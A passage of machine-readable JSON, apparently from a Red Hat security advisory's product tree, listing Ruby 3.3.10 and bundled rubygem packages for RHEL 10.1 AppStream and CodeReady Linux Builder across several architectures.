"product_reference": "rubygem-rexml-0:3.4.4-12.el10_1.noarch",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rss-0:0.3.1-12.el10_1.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-rss-0:0.3.1-12.el10_1.noarch"
},
"product_reference": "rubygem-rss-0:0.3.1-12.el10_1.noarch",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-test-unit-0:3.6.1-12.el10_1.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-test-unit-0:3.6.1-12.el10_1.noarch"
},
"product_reference": "rubygem-test-unit-0:3.6.1-12.el10_1.noarch",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-typeprof-0:0.21.9-12.el10_1.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-typeprof-0:0.21.9-12.el10_1.noarch"
},
"product_reference": "rubygem-typeprof-0:0.21.9-12.el10_1.noarch",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygems-0:3.5.22-12.el10_1.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygems-0:3.5.22-12.el10_1.noarch"
},
"product_reference": "rubygems-0:3.5.22-12.el10_1.noarch",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygems-devel-0:3.5.22-12.el10_1.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygems-devel-0:3.5.22-12.el10_1.noarch"
},
"product_reference": "rubygems-devel-0:3.5.22-12.el10_1.noarch",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-0:3.3.10-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-0:3.3.10-12.el10_1.aarch64"
},
"product_reference": "ruby-0:3.3.10-12.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-0:3.3.10-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-0:3.3.10-12.el10_1.ppc64le"
},
"product_reference": "ruby-0:3.3.10-12.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-0:3.3.10-12.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-0:3.3.10-12.el10_1.s390x"
},
"product_reference": "ruby-0:3.3.10-12.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-0:3.3.10-12.el10_1.src as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-0:3.3.10-12.el10_1.src"
},
"product_reference": "ruby-0:3.3.10-12.el10_1.src",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-0:3.3.10-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-0:3.3.10-12.el10_1.x86_64"
},
"product_reference": "ruby-0:3.3.10-12.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-bundled-gems-0:3.3.10-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.aarch64"
},
"product_reference": "ruby-bundled-gems-0:3.3.10-12.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-bundled-gems-0:3.3.10-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.ppc64le"
},
"product_reference": "ruby-bundled-gems-0:3.3.10-12.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-bundled-gems-0:3.3.10-12.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.s390x"
},
"product_reference": "ruby-bundled-gems-0:3.3.10-12.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-bundled-gems-0:3.3.10-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.x86_64"
},
"product_reference": "ruby-bundled-gems-0:3.3.10-12.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.aarch64"
},
"product_reference": "ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.ppc64le"
},
"product_reference": "ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.s390x"
},
"product_reference": "ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.x86_64"
},
"product_reference": "ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debuginfo-0:3.3.10-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.aarch64"
},
"product_reference": "ruby-debuginfo-0:3.3.10-12.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debuginfo-0:3.3.10-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.ppc64le"
},
"product_reference": "ruby-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debuginfo-0:3.3.10-12.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.s390x"
},
"product_reference": "ruby-debuginfo-0:3.3.10-12.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debuginfo-0:3.3.10-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.x86_64"
},
"product_reference": "ruby-debuginfo-0:3.3.10-12.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debugsource-0:3.3.10-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.aarch64"
},
"product_reference": "ruby-debugsource-0:3.3.10-12.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debugsource-0:3.3.10-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.ppc64le"
},
"product_reference": "ruby-debugsource-0:3.3.10-12.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debugsource-0:3.3.10-12.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.s390x"
},
"product_reference": "ruby-debugsource-0:3.3.10-12.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debugsource-0:3.3.10-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.x86_64"
},
"product_reference": "ruby-debugsource-0:3.3.10-12.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-default-gems-0:3.3.10-12.el10_1.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-default-gems-0:3.3.10-12.el10_1.noarch"
},
"product_reference": "ruby-default-gems-0:3.3.10-12.el10_1.noarch",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-devel-0:3.3.10-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.aarch64"
},
"product_reference": "ruby-devel-0:3.3.10-12.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-devel-0:3.3.10-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.ppc64le"
},
"product_reference": "ruby-devel-0:3.3.10-12.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-devel-0:3.3.10-12.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.s390x"
},
"product_reference": "ruby-devel-0:3.3.10-12.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-devel-0:3.3.10-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.x86_64"
},
"product_reference": "ruby-devel-0:3.3.10-12.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-doc-0:3.3.10-12.el10_1.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-doc-0:3.3.10-12.el10_1.noarch"
},
"product_reference": "ruby-doc-0:3.3.10-12.el10_1.noarch",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-0:3.3.10-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.aarch64"
},
"product_reference": "ruby-libs-0:3.3.10-12.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-0:3.3.10-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.ppc64le"
},
"product_reference": "ruby-libs-0:3.3.10-12.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-0:3.3.10-12.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.s390x"
},
"product_reference": "ruby-libs-0:3.3.10-12.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-0:3.3.10-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.x86_64"
},
"product_reference": "ruby-libs-0:3.3.10-12.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-debuginfo-0:3.3.10-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.aarch64"
},
"product_reference": "ruby-libs-debuginfo-0:3.3.10-12.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-debuginfo-0:3.3.10-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.ppc64le"
},
"product_reference": "ruby-libs-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-debuginfo-0:3.3.10-12.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.s390x"
},
"product_reference": "ruby-libs-debuginfo-0:3.3.10-12.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-debuginfo-0:3.3.10-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.x86_64"
},
"product_reference": "ruby-libs-debuginfo-0:3.3.10-12.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-0:3.1.5-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.aarch64"
},
"product_reference": "rubygem-bigdecimal-0:3.1.5-12.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-0:3.1.5-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.ppc64le"
},
"product_reference": "rubygem-bigdecimal-0:3.1.5-12.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-0:3.1.5-12.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.s390x"
},
"product_reference": "rubygem-bigdecimal-0:3.1.5-12.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-0:3.1.5-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.x86_64"
},
"product_reference": "rubygem-bigdecimal-0:3.1.5-12.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.aarch64"
},
"product_reference": "rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.ppc64le"
},
"product_reference": "rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.s390x"
},
"product_reference": "rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.x86_64"
},
"product_reference": "rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bundler-0:2.5.22-12.el10_1.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-bundler-0:2.5.22-12.el10_1.noarch"
},
"product_reference": "rubygem-bundler-0:2.5.22-12.el10_1.noarch",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-0:0.7.1-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.aarch64"
},
"product_reference": "rubygem-io-console-0:0.7.1-12.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-0:0.7.1-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.ppc64le"
},
"product_reference": "rubygem-io-console-0:0.7.1-12.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-0:0.7.1-12.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.s390x"
},
"product_reference": "rubygem-io-console-0:0.7.1-12.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-0:0.7.1-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.x86_64"
},
"product_reference": "rubygem-io-console-0:0.7.1-12.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.aarch64"
},
"product_reference": "rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.ppc64le"
},
"product_reference": "rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.s390x"
},
"product_reference": "rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.x86_64"
},
"product_reference": "rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-irb-0:1.13.1-12.el10_1.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-irb-0:1.13.1-12.el10_1.noarch"
},
"product_reference": "rubygem-irb-0:1.13.1-12.el10_1.noarch",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-0:2.7.2-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.aarch64"
},
"product_reference": "rubygem-json-0:2.7.2-12.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-0:2.7.2-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.ppc64le"
},
"product_reference": "rubygem-json-0:2.7.2-12.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-0:2.7.2-12.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.s390x"
},
"product_reference": "rubygem-json-0:2.7.2-12.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-0:2.7.2-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.x86_64"
},
"product_reference": "rubygem-json-0:2.7.2-12.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-debuginfo-0:2.7.2-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.aarch64"
},
"product_reference": "rubygem-json-debuginfo-0:2.7.2-12.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-debuginfo-0:2.7.2-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.ppc64le"
},
"product_reference": "rubygem-json-debuginfo-0:2.7.2-12.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-debuginfo-0:2.7.2-12.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.s390x"
},
"product_reference": "rubygem-json-debuginfo-0:2.7.2-12.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-debuginfo-0:2.7.2-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.x86_64"
},
"product_reference": "rubygem-json-debuginfo-0:2.7.2-12.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-minitest-0:5.20.0-12.el10_1.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-minitest-0:5.20.0-12.el10_1.noarch"
},
"product_reference": "rubygem-minitest-0:5.20.0-12.el10_1.noarch",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-power_assert-0:2.0.3-12.el10_1.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-power_assert-0:2.0.3-12.el10_1.noarch"
},
"product_reference": "rubygem-power_assert-0:2.0.3-12.el10_1.noarch",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-0:5.1.2-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.aarch64"
},
"product_reference": "rubygem-psych-0:5.1.2-12.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-0:5.1.2-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.ppc64le"
},
"product_reference": "rubygem-psych-0:5.1.2-12.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-0:5.1.2-12.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.s390x"
},
"product_reference": "rubygem-psych-0:5.1.2-12.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-0:5.1.2-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.x86_64"
},
"product_reference": "rubygem-psych-0:5.1.2-12.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-debuginfo-0:5.1.2-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.aarch64"
},
